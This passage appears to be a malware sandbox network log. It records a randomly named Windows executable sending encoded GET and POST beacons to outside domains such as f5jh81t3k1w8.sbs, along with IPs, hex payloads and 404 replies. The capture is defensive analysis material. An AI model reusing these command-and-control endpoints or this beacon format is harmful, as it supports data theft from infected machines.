                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 35 35 79 51 64 79 59 48 7a 39 4c 77 35 4d 5a 78 53 62 42 30 4b 51 46 34 4e 56 78 2f 33 6e 78 4a 41 48 68 4d 75 77 76 39 47 63 75 34 4c 79 6f 30 68 41 69 58 76 73 2b 51 32 45 5a 7a 75 6f 6a 72 5a 59 33 43 46 70 72 58 7a 59 32 51 33 49 66 62 43 42 43 63 68 50 6a 66 74 31 79 39 58 74 66 54 46 79 45 4d 7a 35 53 2f 38 76 6d 43 64 75 56 33 42 41 4a 4c 66 51 57 37 42 6b 6f 5a 57 67 55 75 5a 6d 36 35 4e 73 77 68 63 57 38 2b 53 63 69 70 58 69 71 71 4d 30 2f 2b 39 6c 37 4b 33 47 64 6a 50 44 34 4e 57 4c 61 37 66 69 2b 31 2f 43 4a 6d 45 35 55 38 69 43 32 77 2f 4d 6a 35 71 6a 36 6a 56 39 4f 54 39 53 4a 5a 48 37 46 4f 79 54 45 62 78 2f 46 6b 39 64 41 4c 54 30 76 43 52 36 76 2b 50 75 78 6e 66 51 45 35 31 30 4d 5a 51 33 39 62 75 36 65 46 47 4b 35 31 44 72 78 6a 4d 53 4e 55 34 48 58 61 46 39 37 6f 44 57 38 4b 7a 51 75 42 75 4e 4f 34 4a 56 37 7a 6f 37 77 49 31 63 45 34 43 6e 77 70 56 50 64 59 72 4c 31 49 6f 4c 37 7a 65 6d 4e 51 68 41 44 6c 6e 30 46 6c 34 6d 35 71 50 7a 38 43 4f 4f 46 6a 2f 6f [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=I55yQdyYHz9Lw5MZxSbB0KQF4NVx/3nxJAHhMuwv9Gcu4Lyo0hAiXvs+Q2EZzuojrZY3CFprXzY2Q3IfbCBCchPjft1y9XtfTFyEMz5S/8vmCduV3BAJLfQW7BkoZWgUuZm65NswhcW8+ScipXiqqM0/+9l7K3GdjPD4NWLa7fi+1/CJmE5U8iC2w/Mj5qj6jV9OT9SJZH7FOyTEbx/Fk9dALT0vCR6v+PuxnfQE510MZQ39bu6eFGK51DrxjMSNU4HXaF97oDW8KzQuBuNO4JV7zo7wI1cE4CnwpVPdYrL1IoL7zemNQhADln0Fl4m5qPz8COOFj/omC2e3I9XjJUSCUlSSwbNhCtuJC0oEhJUGeXqlq+GsO0FaPOUSJkMDahwnwRHJEmjEHZd9aSmSkxLYPGuc4H1PgaV01qDdzgRjQBUomXz/vu4nJ1ZFRkab/T5LzqL5uOY/sdS7y7KciVU6ZAtMj65FreVriEI+z2NxCbpMuES9KcPQw4ifiyv0zeA5p//2MRgDOnOMmxIFauTfG/Tl8YL3cVSiRbJ6owQn8u7oJgLYOv83N1Mz3u/Y7CKN2x3pG/kDZhGOat+Zd9Mg/pk1JKUlISU08JIfWtogutRKYAQGYea/jSShqBPsxpQTbyW2eulSCo8QOMANk2jGpavN1C7tYJKyoSPm0KTzaR/nto1AUw9LFV93Gxwl35mcZe1PuEefOoEDID8UV8+8oGcuUp6DuodSmRQQVeBAT8id9y+VDY0HL4iHuFhPdwIc5mgsQ5jEXZZkvCn2GdQadBrMcUVq88slsXD26h7TxBsn/5gDo8dUI3jqWat1eeNdZCtHbr1JsseQyLiN03DplxxJ6Jid5SZIB4UauJNiWN+0OZqvg1TxUT40beloMKx2oV3uNbv7x4a4ZNyGieIH/IM7ZfXpIMNpjCBEcs2ePKJ07EodSToKgo6c0gT+oDaw/Ng/0vciZOxaUqK7nY2dw7pyaJkjgrzZ2ILsM/Myu [TRUNCATED]
                                                                                          Jan 8, 2025 15:02:05.511255980 CET479INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:04 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.650012103.247.11.204802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:07.072051048 CET513OUTGET /vw2j/?T4OdNH=F7RSTrW3DDBOwoki0QfY8aMemtw+1yb0ACfdAp004E8YzbKK22gfddsBa0Epuash8ZsdFHh4aRsfLVhTQDdPUk63V/0r5CFiWCnEBQtSiunsCfq281UiBsQJqTZKZhMxvZDp0qs=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:02:08.108771086 CET479INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:07 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          37192.168.2.650013192.186.58.31802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:48.661592007 CET514OUTGET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.aihuzhibo.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:02:49.664712906 CET1236INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:49 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6d 6e 2d 48 61 6e 73 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 33 33 3b 26 23 32 31 33 33 31 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 39 32 35 36 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 33 34 33 33 3b 26 23 33 35 30 31 33 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 ef b8 8f f0 9f 8d a5 26 23 32 37 34 32 36 3b 26 23 33 36 38 31 34 3b 26 23 32 30 33 35 31 3b 26 23 32 39 39 39 32 3b f0 9f 93 bb 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b f0 9f 94 a5 f0 9f 98 81 f0 9f 94 a5 26 23 32 35 39 30 33 3b 26 23 32 [TRUNCATED]
                                                                                          Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>kk&#30452;&#25773;&#23433;&#21331;&#26368;&#26032;&#29256;&#20813;&#36153;&#23433;&#35013;</title><meta http-equiv="keywords" content="kk&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;kk&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,kk&#30452;&#25773;&#23433;&#21331;&#23448;&#26041;&#19979;&#36733;&#20307;&#39564;&#24179;&#21488;&#36824;&#35774;&#26377;&#31038;&#21306;&#21151;&#33021;&#35753;&#20320;&#19982;&#20854;&#20182;&#20307;&#32946;&#29233;&#22909;&#32773;&#19968;&#36215;&#20998;&#20139;&#36816;&#21160;&#24515;&#24471;&#20132;&#27969;&#32463;&#39564;&#32467;&#20132;&#26379;&#21451;"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="applicable-device" content="pc"><link rel="alternate" media="only s [TRUNCATED]
                                                                                          Jan 8, 2025 15:02:49.664730072 CET224INData Raw: 77 77 77 2e 61 69 68 75 7a 68 69 62 6f 2e 6e 65 74 2f 72 64 74 6c 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 78 68 74 6d 6c 3b 75 72 6c 3d 68 74 74 70 3a
                                                                                          Data Ascii: www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=xhtml;url=http://www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=html5;url=http://www.aihuzhibo.net/rdtl/"><meta http-equiv="Cache-Control
                                                                                          Jan 8, 2025 15:02:49.664742947 CET1236INData Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 69 74 65 61 70 70 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3e 3c 6d 65
                                                                                          Data Ascii: " content="no-siteapp"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="
                                                                                          Jan 8, 2025 15:02:49.664762020 CET224INData Raw: 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 5f 5f 72 65 73 6f 75 72 63 65 54 79 70 65 22 20 76 61 6c 75 65 3d 22 30 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 5f 5f 69 73 44 69 72 65 63
                                                                                          Data Ascii: put type="hidden" id="__resourceType" value="0"><input type="hidden" id="__isDirectDl" value="0"><bdo lang="877753"></bdo><dfn draggable="c79c2b"></dfn><font dropzone="53dec1"></font><div dir="aa4b71" class="ce3811 topbanner
                                                                                          Jan 8, 2025 15:02:49.664798975 CET1236INData Raw: 20 68 69 64 65 22 3e 3c 61 20 68 72 65 66 3d 22 22 3e 3c 69 6d 67 20 6c 61 6e 67 3d 22 65 33 38 31 31 34 22 20 73 72 63 3d 22 22 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 5f 5f 64
                                                                                          Data Ascii: hide"><a href=""><img lang="e38114" src=""></a></div><input type="hidden" id="__directDlHsCh" value="pc_seo_kk&#30452;&#25773;_hzyx"><script src="http://www.aihuzhibo.net/template/news/wandoujia/static/js/realNameAuth.js" crossorigin="anonymo
                                                                                          Jan 8, 2025 15:02:49.664812088 CET224INData Raw: 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 e6 90 9c e7 b4 a2 e5 ae 89 e5 8d 93 e5 ba 94 e7 94 a8 e5 92 8c e6 b8 b8 e6 88 8f 22 20
                                                                                          Data Ascii: name="key" value="" autocomplete="off" placeholder="" id="j-search-input"><input type="submit" value="" class="kf9ee7 submit" id="j-search-btn"><input type="hidden" name="source" value="deta
                                                                                          Jan 8, 2025 15:02:49.664824963 CET1236INData Raw: 69 6c 22 3e 3c 2f 66 6f 72 6d 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 37 34 64 35 66 36 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65 3d 22 31 37 33 33 62 37 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f
                                                                                          Data Ascii: il"></form><small lang="74d5f6"></small><sup draggable="1733b7"></sup><time dropzone="328ff8"></time><div lang="2f401a" class="lad5eb user-info"><img draggable="757e42" class="md8d19 avatar" id="header_avatar" src="http://www.aihuzhibo.net/tem
                                                                                          Jan 8, 2025 15:02:49.664880037 CET1236INData Raw: 32 66 34 32 20 20 6e 61 76 2d 69 74 65 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 34 37 36 66 63 20 66 69 72 73 74 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 73 70 65 63 69 61 6c 22 3e 3c 73 70 61 6e 3e e4 b8 93 e9 a2 98 3c 2f 73 70 61 6e 3e 3c 2f
                                                                                          Data Ascii: 2f42 nav-item"><a class="b476fc first-link" href="/special"><span></span></a></li><li class="cb69bb nav-item"><a class="df143a first-link" href="/award"><span></span></a></li><li class="e6de6d nav-item"><a class="f188f7 first
                                                                                          Jan 8, 2025 15:02:49.664891958 CET1236INData Raw: e8 87 aa e5 8a a8 e5 88 9b e5 bb ba e8 b4 a6 e5 8f b7 3c 2f 64 69 76 3e 3c 74 69 6d 65 20 64 69 72 3d 22 30 31 62 32 31 38 22 3e 3c 2f 74 69 6d 65 3e 3c 74 74 20 6c 61 6e 67 3d 22 31 32 63 33 38 61 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 64 72 61 67
                                                                                          Data Ascii: </div><time dir="01b218"></time><tt lang="12c38a"></tt><var draggable="5a60b1"></var><div date-time="a95f14" class="o67293 input-wrap"><input type="text" id="login_phone" class="p51173 inner-input" placeholder="
                                                                                          Jan 8, 2025 15:02:49.664902925 CET104INData Raw: 72 6f 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 66 6f 6e 74 20 64 72 6f 70 7a 6f 6e 65 3d 22 35 33 64 61 62 37 22 3e 3c 2f 66 6f 6e 74 3e 3c 69 6e 73 20 64 61 74 65 2d 74 69 6d 65 3d 22 33 36 31 36 66 62 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61
                                                                                          Data Ascii: ror"></div></div><font dropzone="53dab7"></font><ins date-time="3616fb"></ins><small dir="6dab63"></smal
                                                                                          Jan 8, 2025 15:02:49.669739008 CET1236INData Raw: 6c 3e 3c 64 69 76 20 64 69 72 3d 22 66 34 64 65 31 66 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6e 63 22 20 63 6c 61 73 73 3d 22 79 39 32 61 65 65 20 6e 63 2d 77 72 61 70 22 3e 3c 2f 64 69 76 3e 3c 73 75 70 20 6c 61 6e 67 3d 22 62 32 64 65 65 38 22 3e
                                                                                          Data Ascii: l><div dir="f4de1f" id="login_nc" class="y92aee nc-wrap"></div><sup lang="b2dee8"></sup><time draggable="5f34dc"></time><tt dropzone="086ca8"></tt><div lang="868262" class="z2b63d check-privacy"><span id="login_readAgree" class="a5bb68 checkbo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          38192.168.2.650014154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:55.854608059 CET778OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 75 2f 68 53 30 33 37 78 4e 43 78 2f 61 35 69 4e 44 54 57 42 73 56 42 33 54 39 4c 52 30 59 39 71 62 76 42 63 66 39 53 67 79 76 31 74 58 4e 5a 4c 6c 36 45 33 4c 55 49 51 35 31 61 30 75 6d 36 34 6c 46 6f 70 69 5a 59 50 38 6c 38 72 70 6f 4c 2b 54 52 4b 71 65 51 7a 6d 33 66 49 52 36 76 6e 56 44 77 46 34 66 63 31 43 47 2f 4b 54 42 43 4f 7a 63 45 35 75 4e 45 45 75 44 4d 76 56 48 51 63 56 5a 66 7a 78 35 52 68 51 44 64 4f 6f 32 4e 31 66 73 58 56 33 30 55 56 59 6e 45 30 75 35 67 58 75 52 38 58 53 7a 4a 53 64 7a 69 49 51 48 4e 56 66 47 2f 6e 78 55 78 34 36 51 74 4f 31 30 2b 4e
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5Eu/hS037xNCx/a5iNDTWBsVB3T9LR0Y9qbvBcf9Sgyv1tXNZLl6E3LUIQ51a0um64lFopiZYP8l8rpoL+TRKqeQzm3fIR6vnVDwF4fc1CG/KTBCOzcE5uNEEuDMvVHQcVZfzx5RhQDdOo2N1fsXV30UVYnE0u5gXuR8XSzJSdziIQHNVfG/nxUx46QtO10+N
                                                                                          Jan 8, 2025 15:02:56.720065117 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:56 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          39192.168.2.650015154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:58.524048090 CET802OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 4f 76 68 52 58 66 37 33 74 43 77 68 4b 35 69 48 6a 54 53 42 73 52 42 33 57 63 54 52 6d 38 39 71 2b 44 42 64 63 6c 53 6e 79 76 31 69 33 4e 51 46 46 36 50 33 4c 5a 69 51 35 35 61 30 75 79 36 34 6c 31 6f 70 78 78 5a 4f 73 6c 2b 6d 4a 6f 4e 36 54 52 4b 71 65 51 7a 6d 7a 32 6e 52 36 33 6e 55 7a 67 46 37 36 77 30 4d 6d 2f 56 45 78 43 4f 35 38 45 39 75 4e 46 70 75 43 52 41 56 42 55 63 56 59 50 7a 78 72 70 69 46 54 64 49 69 57 4d 67 51 64 4f 62 33 30 64 6e 53 30 45 32 77 71 59 30 76 6e 68 4e 4f 41 4a 78 50 6a 43 4b 51 46 56 6e 66 6d 2f 4e 7a 55 4a 34 6f 48 68 70 36 41 62 75 73 6d 4a 63 6c 66 38 44 6a 37 49 61 43 30 37 51 42 4d 46 72 42 51 3d 3d
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm89q+DBdclSnyv1i3NQFF6P3LZiQ55a0uy64l1opxxZOsl+mJoN6TRKqeQzmz2nR63nUzgF76w0Mm/VExCO58E9uNFpuCRAVBUcVYPzxrpiFTdIiWMgQdOb30dnS0E2wqY0vnhNOAJxPjCKQFVnfm/NzUJ4oHhp6AbusmJclf8Dj7IaC07QBMFrBQ==
                                                                                          Jan 8, 2025 15:02:59.365149021 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
